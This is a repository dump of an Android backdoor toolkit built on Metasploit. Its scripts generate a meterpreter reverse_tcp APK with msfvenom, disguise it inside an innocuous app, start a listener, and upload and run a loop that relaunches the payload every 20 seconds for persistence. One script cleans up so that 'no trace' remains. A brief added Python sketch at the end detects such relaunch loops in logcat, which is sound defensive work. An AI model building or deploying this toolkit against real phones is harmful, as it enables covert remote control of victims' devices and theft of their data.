├── backdoor.rb
├── alwaysOpen.sh
├── android.rb
├── setup
├── connect
├── README.txt
├── LICENSE
├── exploit
└── README.md

/backdoor.rb:
--------------------------------------------------------------------------------
cd /
cd /sdcard/Download
upload /root/Desktop/Metasploit/alwaysOpen.sh /sdcard/Download
shell

--------------------------------------------------------------------------------
/alwaysOpen.sh:
--------------------------------------------------------------------------------
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------
/android.rb:
--------------------------------------------------------------------------------
# Script created by Aaron Vigal http://www.aaronvigal.com
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 10.1.6.133
set lport 443
clear
exploit
exit
--------------------------------------------------------------------------------
/setup:
--------------------------------------------------------------------------------
#!/bin/bash
# Script made by Aaron Vigal. http://www.aaronvigal.com

mkdir ~/Desktop/Metasploit
mkdir ~/Desktop/Metasploit/Android
# Download needed files from github
git clone https://github.com/AaronVigal/Metasploit-Android.git ~/Desktop/Metasploit/Android
# Install dependencies
sudo apt-get -y install at>/dev/null
sudo apt-get -y install libnotify-bin>/dev/null
# Make file executable
sudo chmod +x ~/Desktop/Metasploit/Android/exploit
sudo chmod +x ~/Desktop/Metasploit/Android/connect
# Remove setup file
rm setup
notify-send "Metasploit-Android is done installing :)"
--------------------------------------------------------------------------------
/connect:
--------------------------------------------------------------------------------
#!/bin/bash
# Script made by Aaron Vigal. http://www.aaronvigal.com

read -p "What is the IP Address to listen on? " internalip;
port="443"

# Replace the new variables in the custom metasploit script
sed -i '4s/.*/set lhost '$internalip'/' /root/Desktop/Metasploit/Android/android.rb
sed -i '5s/.*/set lport '$port'/' /root/Desktop/Metasploit/Android/android.rb

# Execute the newly updated script (android.rb)
msfconsole -r /root/Desktop/Metasploit/Android/android.rb

# Delete the APK on close and say goodbye
echo "From the wise words of Kevin Dickerson...";echo "Get lit.";echo "Get good.";echo "Party hard.";echo "";echo "Happy Hacking!!!";echo ""
--------------------------------------------------------------------------------
/README.txt:
--------------------------------------------------------------------------------
#######################################################
## Created by Aaron Vigal. http://www.aaronvigal.com ##
#######################################################
Setup:
> There should be 6 files inside of a folder named Metasploit on your Desktop
> The 4 required files are:
    * alwaysOpen.sh
    * exploit
    * connect
    * android.rb
    * backdoor.rb

Step 1.
> Navigate to the Metasploit folder on the Desktop

Step 2.
> Open up a terminal and run "./exploit" if you haven't made the APK yet
> Run "./connect" if you have already made the APK
Hint: If the file doesn't have the needed permissions, run chmod +x android

Step 3. (If not already done)
> Install and run MainActivity on your android device

Step 4.
> Once a meterpreter session opens, run the following command:
    "resource /root/Desktop/Metasploit/Android/backdoor.rb"

Step 5.
> Type the following 3 commands:
    1. cd /
    2. cd /sdcard/Download
    3. sh alwaysOpen.sh

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2016 Aaron Vigal

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/exploit:
--------------------------------------------------------------------------------
#!/bin/bash
# Script made by Aaron Vigal. http://www.aaronvigal.com

read -p "Name your APK file: " name
read -p "What is the internal IP Address? " internalip;
read -p "What is the external IP Address? " externalip;
read -p "What is the port number? " port

# Create the APK in /root/Desktop/Metasploit with the specified name
msfvenom -p android/meterpreter/reverse_tcp --platform Android --arch dalvik LHOST=$externalip LPORT=$port R > $name.apk

# Replace the new variables in the custom metasploit script
sed -i '4s/.*/set lhost '$internalip'/' /root/Desktop/Metasploit/Android/android.rb
sed -i '5s/.*/set lport '$port'/' /root/Desktop/Metasploit/Android/android.rb

# Tell them that it's all ready
echo "APK File named $name has been created with IP $ip and port $port!"
echo "Exploiting..."

# Execute the newly updated script (android.rb)
msfconsole -r /root/Desktop/Metasploit/Android/android.rb

# Delete the APK on close and say goodbye
rm /root/Desktop/Metasploit/Android/$name.apk
echo "";echo "The APK has been removed and there is no trace remaining ;)";echo "";echo "From the wise words of Kevin Dickerson...";echo "Get lit.";echo "Get good.";echo "Party hard.";echo "";echo "Happy Hacking!!!";echo ""
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Metasploit-Android
This module uses the Metasploit framework built into Kali Linux to create an Android APK that will allow a back door into the user's phone. The script creates the malicious APK file and embeds it into a normal, unsuspicious APK that, when opened, will automatically trigger a Perl script to create a persistent backdoor into the user's phone. This can be done in two ways: over your local area network (LAN), or you can open a port for the data to be sent to and listen on the local binding for the data coming in. These options can be specified while the script is creating the APK.

This tool should run under most versions of Linux but is optimized for working on Kali. The setup is very straightforward: just copy and paste the following code into a terminal:

```{r, engine='bash', count_lines}
wget https://raw.githubusercontent.com/AaronVigal/Metasploit-Android/master/setup
sudo chmod +x setup
sudo ./setup
cd ~/Desktop/Metasplot/Android
sudo ./exploit
```

The setup file checks/installs the following dependencies:

1. Metasploit Framework
2. Ruby

## *Warning!!!*
I, my Affiliates and all of this project's Contributors in no way promote or encourage unlawful hacking, and this toolkit should be rightfully used for its purpose of penetration testing on your own network or any network that you have explicit consent from the Administrator for. I, my Affiliates and any Contributors cannot and will not be held liable for any damage or unlawful action that may occur while using this toolkit.

Happy Hacking!
--------------------------------------------------------------------------------
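Detection note (an added example, not part of this repository): the loop in alwaysOpen.sh relaunches `com.metasploit.stage/.MainActivity` every 20 seconds, which leaves a regular run of activity START entries in logcat. The sketch below flags any component started at a near-constant interval and separately matches the stager package name. The logcat line layout, the thresholds, and the names `find_relaunch_loops` and `known_stager` are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Indicator from alwaysOpen.sh on this page: the component it keeps relaunching.
STAGE_PACKAGE = "com.metasploit.stage"

# Assumed logcat "threadtime" layout; newer Android logs the tag ActivityTaskManager.
START_RE = re.compile(
    r"^(\d\d-\d\d \d\d:\d\d:\d\d\.\d{3}).*Activity(?:Task)?Manager: START u\d+ "
    r"\{.*?cmp=([\w.]+)/([\w.$]+)")

def find_relaunch_loops(lines, min_starts=4, max_jitter=2.0):
    """Map component -> mean interval (s) for activities started at least
    min_starts times with near-constant spacing (population stdev <= max_jitter)."""
    starts = defaultdict(list)
    for line in lines:
        m = START_RE.match(line)
        if m:
            # logcat omits the year; a fixed leap year keeps 02-29 parseable
            ts = datetime.strptime("2000-" + m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            starts[m.group(2) + "/" + m.group(3)].append(ts)
    loops = {}
    for component, times in starts.items():
        if len(times) < min_starts:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if pstdev(gaps) <= max_jitter:
            loops[component] = round(mean(gaps), 1)
    return loops

def known_stager(components):
    """Components whose package matches the Metasploit stager name on this page."""
    return sorted(c for c in components if c.split("/")[0] == STAGE_PACKAGE)

# Constructed sample lines (not captured from a device).
_FMT = "03-14 {} 1234 1300 I ActivityManager: START u0 {{act=android.intent.action.MAIN cmp={}}} from uid {}"
SAMPLE_LOGCAT = [
    _FMT.format(t, "com.metasploit.stage/.MainActivity", 2000)
    for t in ("10:00:00.120", "10:00:20.310", "10:00:40.280", "10:01:00.450")
] + [
    _FMT.format(t, "com.example.notes/.EditActivity", 10021)
    for t in ("10:00:03.000", "10:00:09.500", "10:00:51.200", "10:02:30.900")
]

if __name__ == "__main__":
    loops = find_relaunch_loops(SAMPLE_LOGCAT)
    print(loops, known_stager(loops))
```

The interval check does not depend on the package name, so it still fires if the APK has been repackaged under a different name; the name match only covers the default stager.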